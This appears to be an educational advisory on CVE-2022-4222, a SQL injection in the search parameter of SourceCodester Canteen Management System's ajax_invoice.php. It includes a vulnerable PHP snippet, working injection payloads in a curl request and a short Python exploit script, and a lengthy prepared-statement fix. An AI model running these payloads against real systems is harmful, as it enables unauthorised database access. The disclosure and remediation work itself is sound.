In late 2022, a serious vulnerability was discovered in the popular SourceCodester Canteen Management System, a PHP/MySQL-based web application used in many small business environments. This bug, tracked as CVE-2022-4222 and also referenced as VDB-214523, received a critical rating because it allows attackers to exploit the application remotely and potentially compromise the underlying database.
The issue lies in poor input validation within the ajax_invoice.php file’s handling of POST requests, specifically in the search argument. With little effort, a malicious actor can execute arbitrary SQL commands—classic SQL Injection.
Where is the bug?
The core of the problem is in how ajax_invoice.php processes the search POST parameter. The application takes whatever is sent in via POST, plugs it directly into an SQL query, and runs it with no sanitization or validation.
- Component: POST Request Handler
- File: ajax_invoice.php
- Function: query
- Input: search argument (POST)
- Type: SQL Injection (SQLi)
- Remote? Yes, remote exploitation is possible.
Why is this critical?
SQL Injection is one of the most dangerous types of web vulnerabilities. A successful attack could allow someone to:
Code Analysis
Let’s look at how this might happen in practice. Here's a simplified snippet inspired by the vulnerable code in ajax_invoice.php:
```php
<?php
// ajax_invoice.php (simplified, vulnerable version)
include 'db_config.php'; // provides $conn, a mysqli connection

if (isset($_POST['search'])) {
    // User-controlled value taken straight from the request body
    $search = $_POST['search'];

    // The value is interpolated into the SQL text with no escaping or
    // parameter binding, so quotes in $search change the query structure
    $sql = "SELECT * FROM invoices WHERE invoice_number LIKE '%$search%'";
    $result = $conn->query($sql);

    // Output results...
}
?>
```
> What’s wrong here?
>
> The application takes the `search` input and drops it unfiltered into the SQL string, which is then executed. If someone sends `search=123' OR 1=1 --` as input, the SQL ends up like this:
>
> ```sql
> SELECT * FROM invoices WHERE invoice_number LIKE '%123' OR 1=1 -- %'
> ```
>
> This effectively ignores the real search and returns all invoices. With more complex payloads, an attacker could do much more.
Request
```shell
curl -X POST http://localhost/canteen/ajax_invoice.php -d "search=123' UNION SELECT 1,2,user(),database(),5 -- -"
```
The attacker’s crafted query returns the database user and name instead of invoice data.
Result: Attackers get sensitive database info—they can escalate from there.
Here's a simple Python script to demonstrate automated exploitation:

```python
import requests

# Placeholder host from the original post; replace with the test target
url = 'http://target-site/canteen/ajax_invoice.php'

# Same UNION payload as the curl request above
payload = "' UNION SELECT 1,2,user(),database(),5 -- -"
data = {"search": payload}

response = requests.post(url, data=data)
print(response.text)
```
This script shows how trivially someone can extract information—no authentication required.
Use Prepared Statements
Don’t insert user input directly into SQL. Use prepared statements or parameterized queries instead.
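The following hardened version of the handler is an added example, not code from the SourceCodester project. It assumes, as the vulnerable snippet above does, that db_config.php provides `$conn` as a mysqli connection and that the invoices table has an invoice_number column; the length cap, the LIMIT, the JSON output and the helper name `escapeLikePattern` are choices made here for illustration. The user's value is bound as a parameter, so it can never alter the query structure, and the `%` and `_` LIKE wildcards are escaped as well, since parameter binding alone does not stop a user from turning a search into a match-everything pattern.

```php
<?php
// ajax_invoice.php (hardened version; added example, not the project's own code)
// Assumes db_config.php defines $conn, an open mysqli connection.
include 'db_config.php';

/**
 * Escape LIKE metacharacters so the user's text is matched literally.
 * Binding stops SQL injection, but '%' and '_' are still interpreted by
 * LIKE itself. We use '!' as the escape character and declare it in the
 * query's ESCAPE clause, which avoids backslash double-escaping confusion.
 */
function escapeLikePattern(string $value, string $esc = '!'): string
{
    return str_replace(
        [$esc, '%', '_'],
        [$esc . $esc, $esc . '%', $esc . '_'],
        $value
    );
}

if (isset($_POST['search'])) {
    $search = (string) $_POST['search'];

    // Illustrative length cap: invoice numbers are short, so reject
    // oversized input before it reaches the database at all.
    if (strlen($search) > 64) {
        http_response_code(400);
        exit('Search term too long');
    }

    // The SQL text contains only a placeholder; user data never touches it.
    // LIMIT bounds the result size even for a very broad search.
    $sql = "SELECT * FROM invoices WHERE invoice_number LIKE ? ESCAPE '!' LIMIT 100";

    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        http_response_code(500);
        exit('Query preparation failed');
    }

    // Wildcards are added here, around the already-escaped user text.
    $pattern = '%' . escapeLikePattern($search) . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();

    // get_result() needs the mysqlnd driver; bind_result() is the alternative.
    $result = $stmt->get_result();
    $rows = [];
    while ($row = $result->fetch_assoc()) {
        $rows[] = $row;
    }
    $stmt->close();

    header('Content-Type: application/json');
    echo json_encode($rows);
}
```

With this version, the `123' OR 1=1 --` input from the analysis above is searched for as the literal string `123' OR 1=1 --` and matches nothing; the UNION payload in the curl request likewise returns no rows instead of the database user and name. The same pattern applies with PDO (`$pdo->prepare(...)` followed by `execute([$pattern])`), and in either API the rule is the same: the query text is a constant, and every user-supplied value travels as a bound parameter.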
Reference Links
- Original Advisory at VulDB (VDB-214523)
- NVD CVE-2022-4222 Record
- SourceCodester Project on SourceForge
- OWASP SQL Injection Cheat Sheet
Conclusion
CVE-2022-4222 is a textbook example of how dangerous poor input handling can be. If you run SourceCodester Canteen Management System, update it immediately and sanitize all inputs! Attackers can and do target these easy wins—protect your data before they find you.
Stay safe, update your code, and always validate your inputs!
*This post was created exclusively for educational purposes. Please use this knowledge responsibly and only on systems you own or have explicit permission to test.*
Timeline
Published on: 11/30/2022 07:15:00 UTC
Last modified on: 12/01/2022 23:41:00 UTC